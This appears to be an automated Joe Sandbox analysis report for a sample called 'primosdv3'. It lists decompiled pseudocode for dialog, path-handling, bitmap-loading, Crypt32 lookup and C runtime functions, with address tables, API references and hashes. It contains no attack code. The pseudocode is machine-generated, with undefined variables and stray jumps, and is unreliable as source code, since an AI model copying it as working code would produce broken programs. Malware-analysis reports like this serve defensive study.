Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5

SetDlgItemTextW.USER32(?,00000066,00CA946A), ref: 00C7CEF1
EndDialog.USER32(?,00000001), ref: 00C7CFFE

Strings

%s%s%u, xrefs: 00C7CEC6

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 308b24fd4ad371580ffd964b8bea6b732d5ec9f6e71c4ef52830d562c163c20a
Instruction ID: 18ab468f9051a2c01d924769fc93b679f38249c04b5f6f9d48622ab9d7e438b0
Opcode Fuzzy Hash: 308b24fd4ad371580ffd964b8bea6b732d5ec9f6e71c4ef52830d562c163c20a
Instruction Fuzzy Hash: 394150B1900259AADF259BA0DC85FEE77BCEB15344F40C0A6FA0EE7051EE709A44DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00C6BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00C6BB03(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				void* _t32;
				long _t34;
				void* _t40;
				void* _t55;
				signed short* _t62;
				void* _t65;
				intOrPtr _t67;
				signed short* _t68;
				intOrPtr _t69;

				E00C7EC50(0x1000);
				_t68 = _a4;
				_t70 =  *_t68;
				if( *_t68 == 0) {
					L21:
					__eflags = 0;
					return 0;
				}
				E00C6BC98(_t70, _t68);
				_t65 = E00C83E13(_t68);
				_t32 = E00C6BCC3(_t68);
				_t71 = _t32;
				if(_t32 == 0) {
					_t34 = GetCurrentDirectoryW(0x7ff,  &_v4100);
					__eflags = _t34;
					if(_t34 == 0) {
						goto L21;
					}
					__eflags = _t34 - 0x7ff;
					if(_t34 > 0x7ff) {
						goto L21;
					}
					__eflags = E00C6BD9D( *_t68 & 0x0000ffff);
					if(__eflags == 0) {
						E00C6B690(__eflags,  &_v4100, 0x800);
						_t40 = E00C83E13( &_v4100);
						_t67 = _a12;
						__eflags = _t67 - _t40 + _t65 + 4;
						if(_t67 <= _t40 + _t65 + 4) {
							goto L21;
						}
						E00C70602(_a8, L"\\\\?\\", _t67);
						E00C705DA(__eflags, _a8,  &_v4100, _t67);
						__eflags =  *_t68 - 0x2e;
						if(__eflags == 0) {
							__eflags = E00C6BD9D(_t68[1] & 0x0000ffff);
							if(__eflags != 0) {
								_t68 =  &(_t68[2]);
							}
						}
						L16:
						_push(_t67);
						L5:
						_push(_t68);
						L6:
						_push(_a8);
						E00C705DA(_t73);
						return 1;
					}
					_t14 = _t65 + 6; // 0x6
					_t67 = _a12;
					__eflags = _t67 - _t14;
					if(_t67 <= _t14) {
						goto L21;
					}
					E00C70602(_a8, L"\\\\?\\", _t67);
					__eflags = 0;
					_v4096 = 0;
					E00C705DA(0, _a8,  &_v4100, _t67);
					goto L16;
				}
				if(E00C6BC98(_t71, _t68) == 0) {
					_t55 = 0x5c;
					__eflags =  *_t68 - _t55;
					if( *_t68 != _t55) {
						goto L21;
					}
					_t62 =  &(_t68[1]);
					__eflags =  *_t62 - _t55;
					if( *_t62 != _t55) {
						goto L21;
					}
					_t69 = _a12;
					_t10 = _t65 + 6; // 0x6
					__eflags = _t69 - _t10;
					if(_t69 <= _t10) {
						goto L21;
					}
					E00C70602(_a8, L"\\\\?\\", _t69);
					E00C705DA(__eflags, _a8, L"UNC", _t69);
					_push(_t69);
					_push(_t62);
					goto L6;
				}
				_t2 = _t65 + 4; // 0x4
				_t73 = _a12 - _t2;
				if(_a12 <= _t2) {
					goto L21;
				} else {
					E00C70602(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L5;
				}
			}

0x00c6bb0b
0x00c6bb12
0x00c6bb16
0x00c6bb1a
0x00c6bc84
0x00c6bc84
0x00000000
0x00c6bc84
0x00c6bb21
0x00c6bb2e
0x00c6bb30
0x00c6bb35
0x00c6bb37
0x00c6bbc5
0x00c6bbcb
0x00c6bbcd
0x00000000
0x00000000
0x00c6bbd3
0x00c6bbd5
0x00000000
0x00000000
0x00c6bbe4
0x00c6bbe6
0x00c6bc2f
0x00c6bc3b
0x00c6bc45
0x00c6bc49
0x00c6bc4b
0x00000000
0x00000000
0x00c6bc56
0x00c6bc66
0x00c6bc6b
0x00c6bc6f
0x00c6bc7b
0x00c6bc7d
0x00c6bc7f
0x00c6bc7f
0x00c6bc7d
0x00c6bc1d
0x00c6bc1d
0x00c6bb62
0x00c6bb62
0x00c6bb63
0x00c6bb63
0x00c6bb66
0x00000000
0x00c6bb6b
0x00c6bbe8
0x00c6bbeb
0x00c6bbee
0x00c6bbf0
0x00000000
0x00000000
0x00c6bbff
0x00c6bc04
0x00c6bc06
0x00c6bc18
0x00000000
0x00c6bc18
0x00c6bb41
0x00c6bb74
0x00c6bb75
0x00c6bb78
0x00000000
0x00000000
0x00c6bb7e
0x00c6bb81
0x00c6bb84
0x00000000
0x00000000
0x00c6bb8a
0x00c6bb8d
0x00c6bb90
0x00c6bb92
0x00000000
0x00000000
0x00c6bba1
0x00c6bbaf
0x00c6bbb4
0x00c6bbb5
0x00000000
0x00c6bbb5
0x00c6bb43
0x00c6bb46
0x00c6bb49
0x00000000
0x00c6bb4f
0x00c6bb5a
0x00c6bb5f
0x00000000
0x00c6bb5f

APIs

_wcslen.LIBCMT ref: 00C6BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00C6A275,?,?,00000800,?,00C6A23A,?,00C6755C), ref: 00C6BBC5
_wcslen.LIBCMT ref: 00C6BC3B

Strings

UNC, xrefs: 00C6BBA7
\\?\, xrefs: 00C6BB52, 00C6BB99, 00C6BBF7, 00C6BC4E

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: b09fddba12182616321c21eb4687e361b8b3cc090104b10aaa430e88f2537ece
Instruction ID: 0619d31b6730a7b6302bd2bd89014106414cbdadfdf7849fc073d695b04e7ceb
Opcode Fuzzy Hash: b09fddba12182616321c21eb4687e361b8b3cc090104b10aaa430e88f2537ece
Instruction Fuzzy Hash: 38416A71440256B6CF31AF60CC86EAA7BADAF45390F108466F869E2151EB70DFD09B60

Uniqueness

Uniqueness Score: -1.00%

Function 00C7B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7B6DD(void* __ecx, void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t13;
				void* _t15;
				signed int _t20;
				signed int _t21;
				void* _t23;
				void* _t24;
				void* _t28;
				void* _t35;

				_t35 = __fp0;
				_t23 = __edx;
				_t24 = LoadBitmapW( *0xca1028, 0x65);
				_t21 = _t20 & 0xffffff00 | _t24 == 0x00000000;
				if(_t24 != 0) {
					L2:
					GetObjectW(_t24, 0x18,  &_v28);
					L4:
					if(E00C7A5C6(_t31) != 0) {
						if(_t21 != 0) {
							_t28 = E00C7A6C2(0x66);
							if(_t28 != 0) {
								DeleteObject(_t24);
								_t24 = _t28;
							}
						}
						_t13 = E00C7A605(_v20);
						_t15 = E00C7A80C(_t23, _t35, _t24, E00C7A5E4(_v24), _t13);
						DeleteObject(_t24);
						_t24 = _t15;
					}
					return _t24;
				}
				_t24 = E00C7A6C2(0x65);
				_t31 = _t24;
				if(_t24 == 0) {
					_v24 = 0x5d;
					_v20 = 0x12e;
					goto L4;
				}
				goto L2;
			}

0x00c7b6dd
0x00c7b6dd
0x00c7b6f3
0x00c7b6f7
0x00c7b6fc
0x00c7b70b
0x00c7b712
0x00c7b728
0x00c7b72f
0x00c7b734
0x00c7b73d
0x00c7b741
0x00c7b744
0x00c7b74a
0x00c7b74a
0x00c7b741
0x00c7b74f
0x00c7b75f
0x00c7b767
0x00c7b76d
0x00c7b76f
0x00c7b775
0x00c7b775
0x00c7b705
0x00c7b707
0x00c7b709
0x00c7b71a
0x00c7b721
0x00000000
0x00c7b721
0x00000000

APIs

LoadBitmapW.USER32(00000065), ref: 00C7B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00C7B712
DeleteObject.GDI32(00000000), ref: 00C7B744
DeleteObject.GDI32(00000000), ref: 00C7B767

Part of subcall function 00C7A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00C7B73D,00000066), ref: 00C7A6D5
Part of subcall function 00C7A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A6EC
Part of subcall function 00C7A6C2: LoadResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A703
Part of subcall function 00C7A6C2: LockResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A712
Part of subcall function 00C7A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00C7B73D,00000066), ref: 00C7A72D
Part of subcall function 00C7A6C2: GlobalLock.KERNEL32 ref: 00C7A73E
Part of subcall function 00C7A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00C7A7A7
Part of subcall function 00C7A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00C7A7C6
Part of subcall function 00C7A6C2: GlobalFree.KERNEL32 ref: 00C7A7CD

Strings

], xrefs: 00C7B71A

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: 290add10482564ef4ee9931debaa7a8fa6042a4464465d22443653448cd060ab
Instruction ID: 3dce7700d9d3a13286df0a5fb535c981eb43c480dfabc7762d5489d67d1e0c9d
Opcode Fuzzy Hash: 290add10482564ef4ee9931debaa7a8fa6042a4464465d22443653448cd060ab
Instruction Fuzzy Hash: FB01F53690061577C7127774AC09FBF7ABAAFC0B52F088011FD18A7291DF318E0562B2

Uniqueness

Uniqueness Score: -1.00%

Function 00C7D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00C7D600(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				struct HWND__* _t21;
				signed short _t22;

				_t16 = _a16;
				_t22 = _a12;
				_t21 = _a4;
				_t18 = _a8;
				if(E00C61316(_t17, _t21, _t18, _t22, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t19 = _t18 - 0x110;
				if(_t19 == 0) {
					 *0xcbfcb4 = _t16;
					SetDlgItemTextW(_t21, 0x66, _t16);
					SetDlgItemTextW(_t21, 0x68,  *0xcbfcb4);
					goto L10;
				}
				if(_t19 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t22 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t21, 0x68,  *0xcbfcb4, 0x800);
					_push(1);
					L7:
					EndDialog(_t21, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x00c7d601
0x00c7d606
0x00c7d60b
0x00c7d610
0x00c7d628
0x00c7d68a
0x00000000
0x00c7d68c
0x00c7d62a
0x00c7d630
0x00c7d66f
0x00c7d675
0x00c7d684
0x00000000
0x00c7d684
0x00c7d635
0x00c7d644
0x00000000
0x00c7d644
0x00c7d63a
0x00c7d63d
0x00c7d661
0x00c7d667
0x00c7d64a
0x00c7d64b
0x00000000
0x00c7d64b
0x00c7d642
0x00c7d648
0x00000000
0x00c7d648
0x00000000

APIs

Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370

EndDialog.USER32(?,00000001), ref: 00C7D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00C7D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00C7D675
SetDlgItemTextW.USER32(?,00000068), ref: 00C7D684

Strings

RENAMEDLG, xrefs: 00C7D618

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 045292059aee5a47f6d3156363acf31f363f89ea1e8229836c0da96519c5cc7a
Instruction ID: 8e03ffc24f436d41f326fde155e75b8befe0ae9a21cfa9f2db7a5e90dede541d
Opcode Fuzzy Hash: 045292059aee5a47f6d3156363acf31f363f89ea1e8229836c0da96519c5cc7a
Instruction Fuzzy Hash: C8012833344214BAD2215F65AE09F5F7B7CEF5AB02F018914F30BA20D1C6A29B058775

Uniqueness

Uniqueness Score: -1.00%

Function 00C87E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C87E24,?,?,00C87DC4,?,00C9C300,0000000C,00C87F1B,?,00000002), ref: 00C87E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C87EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00C87E24,?,?,00C87DC4,?,00C9C300,0000000C,00C87F1B,?,00000002,00000000), ref: 00C87EC9

Strings

mscoree.dll, xrefs: 00C87E8C
CorExitProcess, xrefs: 00C87E9E

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 670fa2b962bb410a944b2e86d2f86063cccdafc17b1ee457bbe13ad3cdfbc060
Instruction ID: e0a92ae89abd4119905cca848bd8610161aa6b6fc196e6d440a7a1d3f8ecebf9
Opcode Fuzzy Hash: 670fa2b962bb410a944b2e86d2f86063cccdafc17b1ee457bbe13ad3cdfbc060
Instruction Fuzzy Hash: F9F04431904218BFCB119BA0DC0DB9EBFB4EB44715F1141AAF815A2190DB319F40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00C6F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C6F2C5(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E00C7081B(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}

0x00c6f2c6
0x00c6f2cc
0x00c6f2d3
0x00c6f2d8
0x00c6f2dc
0x00c6f2f1
0x00c6f2f4
0x00c6f2fa
0x00c6f2fa
0x00c6f2fd
0x00000000
0x00c6f2fd
0x00c6f302

APIs

Part of subcall function 00C7081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C70836
Part of subcall function 00C7081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C6F2D8,Crypt32.dll,00000000,00C6F35C,?,?,00C6F33E,?,?,?), ref: 00C70858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C6F2E4
GetProcAddress.KERNEL32(00CA81C8,CryptUnprotectMemory), ref: 00C6F2F4

Strings

Crypt32.dll, xrefs: 00C6F2CE
CryptProtectMemory, xrefs: 00C6F2DE
CryptUnprotectMemory, xrefs: 00C6F2EA

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 8f7f6d5e204f77374c00dc84c531da5ad2a5f431d046b08a56e6483b0e5b60dc
Instruction ID: 9f0acbf22283f2b2862503577f5b599a294d9c1135204d7d13699e253cc2983b
Opcode Fuzzy Hash: 8f7f6d5e204f77374c00dc84c531da5ad2a5f431d046b08a56e6483b0e5b60dc
Instruction Fuzzy Hash: 15E086709507819EDB309F74A84DB067BD46F04714F14C83EF0DAD3650DBB4D5419B50

Uniqueness

Uniqueness Score: -1.00%

Function 00C82BDA Relevance: 7.7, APIs: 5, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E00C82BDA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed char* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed char _t81;
				signed char _t84;
				signed int _t85;
				signed int _t86;
				signed int _t97;
				signed char _t99;
				signed int* _t100;
				signed char* _t103;
				signed int _t109;
				void* _t113;

				_push(0x10);
				_push(0xc9c248);
				E00C7F5F0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t113 + 0x10);
				_t81 = _t52[4];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t99 = _t52[8];
					if(_t99 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t109 =  *(_t113 + 0xc);
						if(_t84 >= 0) {
							_t109 = _t109 + 0xc + _t99;
						}
						 *(_t113 - 4) = _t75;
						_t103 =  *(_t113 + 0x14);
						if(_t84 >= 0 || ( *_t103 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t113 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t103 & 0x00000001;
								if(( *_t103 & 0x00000001) == 0) {
									_t85 =  *(_t54 + 0x18);
									__eflags = _t103[0x18] - _t75;
									if(_t103[0x18] != _t75) {
										__eflags = _t85;
										if(_t85 == 0) {
											goto L32;
										} else {
											__eflags = _t109;
											if(_t109 == 0) {
												goto L32;
											} else {
												__eflags =  *_t103 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t103 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t113 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t85;
										if(_t85 == 0) {
											goto L32;
										} else {
											__eflags = _t109;
											if(_t109 == 0) {
												goto L32;
											} else {
												E00C80320(_t109, E00C8027C(_t85,  &(_t103[8])), _t103[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t109;
										if(_t109 == 0) {
											goto L32;
										} else {
											E00C80320(_t109,  *(_t54 + 0x18), _t103[0x14]);
											__eflags = _t103[0x14] - 4;
											if(_t103[0x14] == 4) {
												__eflags =  *_t109;
												if( *_t109 != 0) {
													_push( &(_t103[8]));
													_push( *_t109);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t97 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0xcc205c; // 0x0
							 *((intOrPtr*)(_t113 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0xc93278();
								_t97 =  *((intOrPtr*)(_t113 - 0x1c))();
								L12:
								if(_t97 == 0 || _t109 == 0) {
									L32:
									E00C88D24(_t75, _t99, _t103, _t109);
									asm("int3");
									_push(8);
									_push(0xc9c268);
									E00C7F5F0(_t75, _t103, _t109);
									_t100 =  *(_t113 + 0x10);
									_t86 =  *(_t113 + 0xc);
									__eflags =  *_t100;
									if(__eflags >= 0) {
										_t105 = _t86 + 0xc + _t100[2];
										__eflags = _t86 + 0xc + _t100[2];
									} else {
										_t105 = _t86;
									}
									 *(_t113 - 4) =  *(_t113 - 4) & 0x00000000;
									_t110 =  *(_t113 + 0x14);
									_push( *(_t113 + 0x14));
									_push(_t100);
									_push(_t86);
									_t77 =  *((intOrPtr*)(_t113 + 8));
									_push( *((intOrPtr*)(_t113 + 8)));
									_t58 = E00C82BDA(_t77, _t105, _t110, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00C838E4(_t105, _t110[0x18], E00C8027C( *((intOrPtr*)(_t77 + 0x18)),  &(_t110[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00C838F4(_t105, _t110[0x18], E00C8027C( *((intOrPtr*)(_t77 + 0x18)),  &(_t110[8])), 1);
										}
									}
									 *(_t113 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t113 - 0x10));
									return _t61;
								} else {
									 *_t109 = _t97;
									_push( &(_t103[8]));
									_push(_t97);
									L21:
									 *_t109 = E00C8027C();
									L29:
									 *(_t113 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t113 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x00c82bda
0x00c82bdc
0x00c82be1
0x00c82be6
0x00c82be8
0x00c82beb
0x00c82bf0
0x00c82d00
0x00c82d00
0x00c82d00
0x00000000
0x00c82bff
0x00c82bff
0x00c82c04
0x00c82c0e
0x00c82c10
0x00c82c15
0x00c82c1a
0x00c82c1a
0x00c82c1c
0x00c82c1f
0x00c82c24
0x00c82c46
0x00c82c46
0x00c82c49
0x00c82c4c
0x00c82c6a
0x00c82c6d
0x00c82cac
0x00c82caf
0x00c82cb2
0x00c82cd7
0x00c82cd9
0x00000000
0x00c82cdb
0x00c82cdb
0x00c82cdd
0x00000000
0x00c82cdf
0x00c82cdf
0x00c82ce4
0x00c82ce8
0x00c82ce8
0x00c82ce9
0x00000000
0x00c82ce9
0x00c82cdd
0x00c82cb4
0x00c82cb4
0x00c82cb6
0x00000000
0x00c82cb8
0x00c82cb8
0x00c82cba
0x00000000
0x00c82cbc
0x00c82ccd
0x00000000
0x00c82cd2
0x00c82cba
0x00c82cb6
0x00c82c6f
0x00c82c6f
0x00c82c73
0x00000000
0x00c82c79
0x00c82c79
0x00c82c7b
0x00000000
0x00c82c81
0x00c82c88
0x00c82c90
0x00c82c94
0x00c82c96
0x00c82c99
0x00c82c9e
0x00c82c9f
0x00000000
0x00c82c9f
0x00c82c99
0x00000000
0x00c82c94
0x00c82c7b
0x00c82c73
0x00c82c4e
0x00c82c4e
0x00000000
0x00c82c4e
0x00c82c2b
0x00c82c2b
0x00c82c30
0x00c82c35
0x00000000
0x00c82c37
0x00c82c39
0x00c82c42
0x00c82c51
0x00c82c53
0x00c82d12
0x00c82d12
0x00c82d17
0x00c82d18
0x00c82d1a
0x00c82d1f
0x00c82d24
0x00c82d27
0x00c82d2a
0x00c82d2d
0x00c82d36
0x00c82d36
0x00c82d2f
0x00c82d2f
0x00c82d2f
0x00c82d39
0x00c82d3d
0x00c82d40
0x00c82d41
0x00c82d42
0x00c82d43
0x00c82d46
0x00c82d4f
0x00c82d4f
0x00c82d52
0x00c82d88
0x00c82d54
0x00c82d54
0x00c82d54
0x00c82d57
0x00c82d6e
0x00c82d6e
0x00c82d57
0x00c82d8d
0x00c82d97
0x00c82da3
0x00c82c61
0x00c82c61
0x00c82c66
0x00c82c67
0x00c82ca1
0x00c82ca8
0x00c82cec
0x00c82cec
0x00c82cf3
0x00c82d02
0x00c82d05
0x00c82d11
0x00c82d11
0x00c82c53
0x00c82c35
0x00000000
0x00000000
0x00000000
0x00c82c04

APIs

___AdjustPointer.LIBCMT ref: 00C82CA1
___AdjustPointer.LIBCMT ref: 00C82CC4
_abort.LIBCMT ref: 00C82D12
___AdjustPointer.LIBCMT ref: 00C82D60

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
